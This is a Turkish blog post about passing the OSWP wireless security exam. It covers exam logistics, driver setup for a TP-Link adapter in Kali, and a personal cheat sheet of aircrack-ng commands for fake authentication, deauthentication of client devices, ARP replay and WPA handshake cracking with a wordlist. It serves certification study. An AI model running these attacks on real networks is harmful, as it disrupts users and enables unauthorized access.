OSWP 2020 Journey & Wi-fi Hacking Cheat-Sheet TR
Bu yazımda OSWP sürecini, bu sertifikayı elde ederken izlenecek çalışma pratiklerinden bahsedeceğim.
OSWP sınavına kısaca değinecek olursam;
Sınav Kapsamı ve Sınav Süreci
Sınav’da alınan eğitim (PEN-210 Wireless Attacks: The Official OSWP Certification Course ) kapsamındaki konular yani WEP, WPA ve WPA2'i çeşitli senaryolar ile kırmayı ele alıyor. 3 adet soru bulunuyor. Bu soruları istediğiniz öncelikte başlayıp Wifi Pass’i elde etmeniz gerekiyor. Bu süreçte zaman oldukça kısıtlı ve yetmiyor. Bu nedenle takıldığınız soruda rabbit-hole’a hapsolmadan hızlıca elinizdeki data’yı kontrol etmeli ve yeni bir yol çizmelisiniz.
Sınav saatinden yaklaşık 1–2 dakika önce Size SSH bilgileri geliyor ve istediğiniz sistemden Mac OS, Kali, Windows, vb. bağlanıp uzaktaki makine üzerinden çözmeye başlayabiliyorsunuz. Sistemler oldukça eski. Benim şansıma bir soruda makine arızalandı. Ve doğru adımları izlememe rağmen bir türlü sonuca ulaşamadım. Ve kötü kısım işe protector olmadığından kime danışacağımın paniğine kapıldım. Bu nedenle Off-Sec’in support bölümünden hızlıca iletişime geçtim. Kendisine durumu anlattım. Ve kendisi benden SSH bağlantımı sonlandırmamı ve incelemek için makineye gireceklerini belirttiler. Bu işlem 25 ile 30 dakika süreceğini belirttiler. Ancak bu süre yaklaşık 1 saat sürdü. Ve bu heyecan içinde beklerken kendilerine sürekli danıştım vaktimin azaldığını söyledim. Kendileri eğer doğru bir bildirim yaptıysam ek zaman vereceklerini söylediler. Ancak bu süre içinde yanlış bi bildirim yaptıysam sınavım resmen fail’e doğru ilerliyordu. Ardından bana doğru bildirim yaptığımı ve mail atarsam ek 1 saat vereceklerini söylediler. Hızlıca girip tekrar bu soruya yönelince bu sefer onardıklarından çözdüm. Ancak bu sürecin insanı çok gerdiğini ve yorduğunu belirtebilirim. Peşine sınavımı tamamladım. Ve hazır sürem devam ederken raporu hazırladım. Ve gönderdim.
Bu süre içerisindeki en zorlu kısım makineler eski olması ve iletişime geçmenin zorluğu olduğunu söyleyebilirim.
Sınav Süresi : Sınav set ettiğiniz tarihte ve saat gerçekleşiyor ve 3 saat 45 dakikanın sonunda bitiyor. Cidden bir anda sonlanıyor bu nedenle her işlem yapışınızda ekran görüntüsü almayı unutmayın. Sona bırakmayın!
Şimdi Evinizde pratik yapmadan önce donanıma sahip olmaya değineceğim. Çünkü ülkemizde maalesef ne kadar arasamda stok durumda ALFA Network’ün Wifi Ağ adaptörü bulunmuyor.
Bizde o nedenle TP-LINK TL-WN722N ile devam edeceğiz. Burda Kali’de işlemlerimizi yapacağımızdan aşağıdaki adımları izleyerek Kali’ye kartımızı ekleyelim;
Update the Software Source;
$ sudo apt-get clean
$ sudo apt-get update
$ sudo apt-get upgrade
Install the Kernel Header File
$ sudo apt-get install linux-headers-$(uname -r)
Check the system version of Kali
$ uname -r
Download and compile linux-kbuild
Örneğin: linux-kbuild-4.14_4.14.17.-1kali_amd64.deb as an example.
Download and setup:
sudo dpkg -i linux-kbuild-4.14_4.14.17–1kali_amd64.debsudo dpkg -i linux-kbuild-4.14_4.14.17–1kali_amd64.deb
$ sudo dpkg -i linux-header-4.14.0-kali3-amd64_4.14.17–1kali_amd64.deb
$ dpkg-query -s linux-headers-$(uname -r)
Compile Driver Source:
cd kali
$ make clean
$ make
Load the Driver:
$ sudo cp 88x2bu.ko /lib/modules/[kernel version]/kernel/drivers/net/wireless/
$ sudo depmod -a
$ sudo modprobe 88x2bu
$ sudo insmod 88x2bu.ko
Artık Hazır !
Şimdi testlerimize başlayabiliriz.
Yazımın diğer kısmında genel Wifi Hacking adımlarından bahsedeceğim ve kendi hazırladığım Cheat Sheet’imi paylaşacağım;
Wifi Hacking Cheat Sheet
Genel Komutlar
Wireless Card Kontrol et;
iwconfig
Interface’i Monitor mod’da çalışmak içinse;
airmon-ng start wlan0
Çevredeki AP’leri bulmak için;
airodump-ng wlan0
Interface’i durdurup kanal ayarlamak içinse;
airmon-ng stop mon0
Belirli bir kanalda monitor mod’da çalışmak içinse;
airmon-ng start wlan0 <Channel Number>
Saldırılar ve işlemleri;
Bir AP’yi MAC adresi ve Channel özelinde aratıp bilgi toplamak için;
airodump-ng -c 3 — bssid 34:08…3D:38 -w clearcap wlan0
Ardından toplanan paketleri Wireshark ile incelemek için;
Wireshark clearcap-01.cap
Replay Injection Test’i yapalım bu sayede etraftaki makineleri bulabiliriz;
İlk olarak kartımızı monitor mod’a almak için;
airmon-ng start wlan0
Ardından Replay Injection için;
aireplay-ng -9 mon0
Şimdi Card to Card Injection testi yapalım;
aireplay-ng -9 -i wlan1 mon0
Fake Auth. Attack
İlk olarak Channel 3 de monitor mod açalım
airmon-ng start wlan0 3
airodump-ng -c 3 — bssid 34:08….3D:38 -w wep1 mon0
Bu sayede Airodump paketleri toplamaya ve wep1 icine yazmaya başlar.Bu AP’ye bağlı olan makineleri STATION altında görebiliriz
Fake Auth için;
Aireplay-ng -1 0 -e AP_ISMI -a AP_MAC_ADRESI -h KENDI_MAC mon0
Böyle station kısmına bizde düştük ve fake auth request’i oluşturduk. Wireshark ile bu incelersek;
Wireshark caps/fake_auth.cap
Deauth Attack
aireplay-ng -0 1 -a AP_MAC -c VICTIM_MAC mon0
Wireshark’da görüntülemek içinse;
wireshark caps/de-auth.cap
Arp Request Replay Attack;
Fake Auth Attack
aireplay-ng -1 0 -e AP_ISMI -a AP_MAC -h KENDI_MAC mon0
Arp Request Replay Attack için;
aireplay-ng -3 -b AP_MAC -h KENDI_MAC mon0
DeAuth atak yapalım o sırada;
aireplay-ng -0 1 -a AP_MAC -c VICTIM_MAC mon0
Ve bi anda Arp Request Replay atağı data iletmeye başlar.
Cracking WPA
airmon-ng start wlan0
airodump-ng -c (channel) –bssid (AP MAC) -w (dosya_adı) wlan0mon
aireplay-ng -0 1 -a (AP MAC) -c (Kurban CLIENT) wlan0mon {disassociation attack}
aircrack-ng -0 -w (wordlist path) (caputure dosya_adı)